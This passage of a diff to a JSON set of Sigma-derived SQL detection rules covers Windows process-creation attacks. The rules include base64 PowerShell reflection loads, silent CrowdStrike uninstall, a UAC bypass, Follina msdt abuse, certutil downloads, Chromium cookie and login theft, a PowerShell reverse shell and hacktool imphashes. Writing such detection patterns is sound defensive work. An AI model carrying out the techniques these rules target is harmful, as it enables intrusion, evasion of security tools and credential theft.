'%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE 